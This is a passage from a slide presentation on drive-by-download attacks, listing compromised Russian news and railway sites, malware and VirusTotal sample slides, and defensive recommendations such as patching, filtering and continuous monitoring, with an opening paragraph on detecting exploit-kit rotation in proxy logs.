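In the constructed log the decoy is hit all day (a window of more than eleven hours) while the kit host is reached by three different clients within eleven minutes; the threshold of sixty minutes is arbitrary and should be tuned to how long the rotation is observed to last. This is the "see what's happening (continuous monitoring)" item from the closing slide made concrete: only a full day of proxy data shows the rotation.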
![Page 35: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/35.jpg)
Known sites examples: RZD.RU (Russian Railways)
![Page 36: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/36.jpg)
Known sites examples: RZD.RU
![Page 37: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/37.jpg)
Known sites examples: RZD.RU (Russian Railways)
![Page 38: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/38.jpg)
Known sites examples: RZD.RU
![Page 39: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/39.jpg)
Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)
![Page 40: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/40.jpg)
Known sites examples: KP.RU
![Page 41: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/41.jpg)
Other examples: EG.RU (newspaper, 263 685 visits per day)
![Page 42: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/42.jpg)
Other examples: svpressa.ru (newspaper 276 720 visits per day)
![Page 43: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/43.jpg)
Malware examples: Banks targeted attack
![Page 44: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/44.jpg)
Malware examples: Banks targeted attack
![Page 45: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/45.jpg)
• Legal
• Faked
Another news,
another phone…
![Page 46: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/46.jpg)
Malware examples: Banks targeted attack
![Page 47: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/47.jpg)
Malware examples
![Page 48: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/48.jpg)
Malware examples
![Page 49: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/49.jpg)
Script examples
![Page 50: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/50.jpg)
Sample analysis (Virus Total)
![Page 51: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/51.jpg)
Sample analysis (Virus Total)
![Page 52: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/52.jpg)
Sample analysis (Virus Total)
![Page 53: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/53.jpg)
Sample analysis (Virus Total)
![Page 54: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/54.jpg)
Sample analysis (Virus Total)
![Page 55: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/55.jpg)
Sample analysis (Virus Total)
![Page 56: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/56.jpg)
What can we do?
• Patch endpoints
• Tighten Internet filtering (default deny if possible)
• No Internet surfing with admin rights
• See what's happening (continuous monitoring)
• Check if you're well (regular technical audits)
• Educate people
![Page 57: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/57.jpg)
Credits
• Sergey V. Soldatov,
TBINFORM (TNK-BP Group)
• Konstantin Y. Kadushkin,
TBINFORM (TNK-BP Group)
• Wayne Huang,
ARMORIZE
![Page 58: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/58.jpg)
THE END
Vladimir B. Kropotov Information security analyst TBINFORM (TNK-BP Group)